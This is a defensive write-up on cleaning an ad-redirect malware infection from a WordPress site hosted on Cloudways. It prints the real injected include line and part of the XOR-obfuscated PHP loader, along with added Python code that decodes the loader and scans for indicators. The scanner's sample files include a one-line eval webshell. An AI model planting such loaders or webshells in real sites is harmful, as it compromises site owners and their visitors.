
How to clean up malware on a WordPress site hosted on Cloudways

Today I worked on a customer's WordPress site hosted on a Cloudways server. When the site was opened on a mobile phone it automatically redirected to a third-party advertising site, which is a clear symptom of a malware infection. This article records how the ad-redirect malware was cleaned up.

The mechanism is the same as the ad-redirect malware I have seen before: a vulnerability in a plugin, or in WordPress itself, is used to upload malicious files to the server. For example, at the top of index.php we found this string of obfuscated code:

 <?php /*85ba2*/ @include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti"); /*85ba2*/

The include points to a hidden file named .c963ccee.oti. The \x65 and \x2d sequences in the path are only the letters e and - written as hex escapes, which PHP resolves inside a double-quoted string, so the real target is /home/10579**.cloudwaysapps.com/zmwjzuegcg/public_html/wp-includes/blocks/site-title/.c963ccee.oti. That file contains the following:

 <?php $om12efh = pack('H*', '0a0041131e05535551575008');
 $ozsfhl = 'xa6fli70284m';
 $ozsfhl = $ozsfhl ^ $om12efh;
 $o8dk17mz = "";
 $o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
 $o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");

The payload is long and is not fully decoded here, but experience says you do not need to decode it to know it is malicious. WordPress core files are open source and readable; a legitimate file never consists of XOR-obfuscated, percent-encoded strings that are assembled into code at runtime.
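The first layer of this obfuscation is cheap to peel back, and doing so confirms what the file is. The script below is an added example, not code from the original post: it takes the two constants that appear in the snippets above (the `pack('H*', ...)` hex string and the `'xa6fli70284m'` literal), reproduces PHP's byte-wise string XOR to recover the function name the loader calls, resolves the `\x65`-style escapes in the include path the way a PHP double-quoted string would, and applies the recovered function to the first percent-encoded chunk. The handling of octal `\NNN` escapes goes beyond what the page shows and is included because the same decoder covers both PHP escape forms.

```python
"""Decode the first obfuscation layer of the injected PHP shown above.

Added example, not the author's or WordPress' code. The constants are
copied from the snippets on the page; the helper names are assumptions.
"""
import re
from urllib.parse import unquote_to_bytes

# Include path from the injected line in index.php (the 10579** part is elided on the page).
INCLUDE_PATH = (r"/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html"
                r"/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti")

# From .c963ccee.oti: the pack('H*', ...) argument and the literal it is XORed with.
PACK_HEX = "0a0041131e05535551575008"
XOR_LITERAL = "xa6fli70284m"

# First percent-encoded chunk that is passed to the recovered function.
ENCODED_CHUNK = ("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA"
                 "%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B"
                 "%11K%17%006M%11%5CWG%06CBI%0E%5E")

# PHP double-quoted strings understand \xHH (1-2 hex digits) and \NNN (1-3 octal digits).
_PHP_ESCAPE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3})")


def decode_php_escapes(s: str) -> str:
    """Resolve \\xHH and \\NNN escapes the way PHP does inside a double-quoted string."""
    def one(m):
        tok = m.group(1)
        code = int(tok[1:], 16) if tok[0] == "x" else int(tok, 8)
        return chr(code)
    return _PHP_ESCAPE.sub(one, s)


def recover_function_name(pack_hex: str, literal: str) -> str:
    """Reproduce `pack('H*', hex) ^ literal`.

    PHP's ^ on two strings XORs them byte by byte and truncates to the
    shorter operand; here both are 12 bytes long.
    """
    key = bytes.fromhex(pack_hex)
    return bytes(a ^ b for a, b in zip(key, literal.encode("latin-1"))).decode("latin-1")


def decode_chunk(chunk: str) -> bytes:
    """Apply rawurldecode semantics (percent-decoding, '+' left alone) to one chunk.

    The result is still covered by a further layer whose key is not on the
    page, so this only shows that the decoded bytes are not readable code.
    """
    return unquote_to_bytes(chunk)


if __name__ == "__main__":
    print("include target :", decode_php_escapes(INCLUDE_PATH))
    print("callable       :", recover_function_name(PACK_HEX, XOR_LITERAL))
    print("chunk[:16]     :", decode_chunk(ENCODED_CHUNK)[:16])
```

Recovering the callable is the useful part: `$ozsfhl` becomes the name of a built-in decoding function, and `$ozsfhl("...")` is PHP's variable-function call syntax, so the loader is doing nothing more than percent-decoding chunks into a buffer. Seeing a built-in name reached through XOR rather than written plainly is by itself enough to classify the file.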

Besides this, there were other planted files in the same folder, which are not listed here.

Once the infection method is understood, the fix is simple: delete the malicious files and replace the modified files with clean copies.

The easiest way is to delete all WordPress files and reinstall. The wp-content/uploads folder must be preserved manually, otherwise all of the site's images are lost after the reinstall.

Cloudways is a managed VPS, so the customer's account does not have the highest permission level. In this case the malicious files could not be deleted over SFTP or SSH, so Cloudways support had to be contacted to remove them.

Finally, the steps for handling an infected website on Cloudways:

  1. Take a full backup of the infected site (files and database) before changing anything;
  2. Delete all files and folders except wp-content/uploads (if your permissions are insufficient, ask Cloudways support to delete them for you);
  3. Download a fresh WordPress installation package and reinstall the site;
  4. Reinstall the previous themes and plugins from clean copies.
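Before step 2, it helps to know which files carry the indicators seen above, and the one directory you keep (wp-content/uploads) deserves a look of its own, because it is a common place to park a webshell that survives a reinstall. The script below is an added example, not the author's procedure or Cloudways tooling: it scans a WordPress tree for the indicators visible in the snippets above (an `@include` whose path uses hex escapes, `pack('H*', ...)`, a variable XORed into a callable, a hidden file under a core directory, any PHP file under uploads) and then splits the top level into keep and delete sets according to the procedure above. The sample tree it builds in a temporary directory is constructed for this example; the indicator regexes are heuristics and a hit is a lead to inspect, not a verdict.

```python
"""Triage a WordPress tree for the indicators seen in this incident and plan the cleanup.

Added example, not the author's or Cloudways' code. Indicator patterns
are derived from the snippets on the page; the sample tree, file names
and thresholds are assumptions made for illustration.
"""
import re
import tempfile
from pathlib import Path

# Indicator name -> regex applied to any file that contains a PHP open tag.
INDICATORS = {
    "include with hex-escaped path": re.compile(
        r"""@?include(_once)?\s*\(\s*["'][^"']*\\x[0-9a-fA-F]{2}""", re.I),
    "pack('H*') string building": re.compile(r"""pack\s*\(\s*['"]H\*['"]""", re.I),
    "variable XORed into a callable": re.compile(r"\$\w+\s*=\s*\$\w+\s*\^\s*\$\w+\s*;"),
}
PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".php7", ".phar"}
CORE_DIRS = ("wp-includes", "wp-admin")   # shipped by WordPress, contain no dotfiles


def _rel(root: Path, p: Path) -> str:
    return p.relative_to(root).as_posix()


def scan_tree(root) -> list:
    """Return [(relative path, reason)] for every suspicious file under root."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel, parts = _rel(root, p), p.relative_to(root).parts
        if parts[0] in CORE_DIRS and p.name.startswith("."):
            hits.append((rel, "hidden file inside a core directory"))
        if parts[:2] == ("wp-content", "uploads") and p.suffix.lower() in PHP_EXTENSIONS:
            hits.append((rel, "PHP file inside wp-content/uploads"))
        text = p.read_text(encoding="utf-8", errors="replace")
        if "<?" in text:   # PHP can hide in any extension, as the .oti file shows
            for name, rx in INDICATORS.items():
                if rx.search(text):
                    hits.append((rel, name))
    return hits


def plan_cleanup(root):
    """Keep only wp-content/uploads, as the procedure above says; everything else is deleted."""
    root = Path(root)
    keep, delete = [], []
    for p in sorted(root.iterdir()):
        if p.name == "wp-content":
            for child in sorted(p.iterdir()):
                (keep if child.name == "uploads" else delete).append(_rel(root, child))
        else:
            delete.append(_rel(root, p))
    return keep, delete


# Constructed sample: one infected index.php, one planted loader, one webshell in uploads, clean files.
INJECTED_INDEX = (
    '<?php /*85ba2*/ @include ("/hom\\x65/example/public_html/wp\\x2dinclud\\x65s'
    '/blocks/sit\\x65\\x2dtitl\\x65/.c963cc\\x65\\x65.oti"); /*85ba2*/\n'
    '/* original WordPress index.php follows */\n'
    'define("WP_USE_THEMES", true);\nrequire __DIR__ . "/wp-blog-header.php";\n')
DROPPER = "<?php $k = pack('H*', '0a00'); $f = 'xa'; $f = $f ^ $k; $p = ''; $p .= $f('%41');\n"
SAMPLE_FILES = {
    "index.php": INJECTED_INDEX,
    "wp-includes/blocks/site-title/.c963ccee.oti": DROPPER,
    "wp-includes/blocks/site-title/block.json": '{"name": "core/site-title"}\n',
    "wp-content/uploads/2023/06/photo.jpg": "not really a jpeg\n",
    "wp-content/uploads/2023/06/cache.php": "<?php eval($_POST['c']);\n",
    "wp-content/plugins/akismet/akismet.php": "<?php /* Plugin Name: Akismet */\n",
    "wp-config.php": "<?php define('DB_NAME', 'wp');\n",
}


def build_sample_tree(root) -> Path:
    root = Path(root)
    for rel, body in SAMPLE_FILES.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")
    return root


def demo():
    """Build the sample tree in a temp dir and return (hits, keep, delete)."""
    root = build_sample_tree(tempfile.mkdtemp(prefix="wp-triage-"))
    return scan_tree(root), *plan_cleanup(root)


if __name__ == "__main__":
    hits, keep, delete = demo()
    for path, reason in hits:
        print(f"SUSPICIOUS {path}: {reason}")
    print("keep  :", keep)
    print("delete:", delete)
```

Two practical notes. Anything flagged under uploads should be removed before you carry the folder over, since the reinstall never touches it. And wp-config.php is in the delete set here only because the procedure above deletes everything but uploads; copy the database credentials out of the backup before you wipe it, and retype them into the fresh wp-config.php rather than restoring the old file, which is itself a common injection target. On a host where you have WP-CLI, `wp core verify-checksums` is the quickest check that the reinstalled core files match the official release; that command is outside this page's procedure and is mentioned as an extra check.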

After this procedure the malicious files are gone. If you cannot fix it yourself, you can pay the author to handle it.
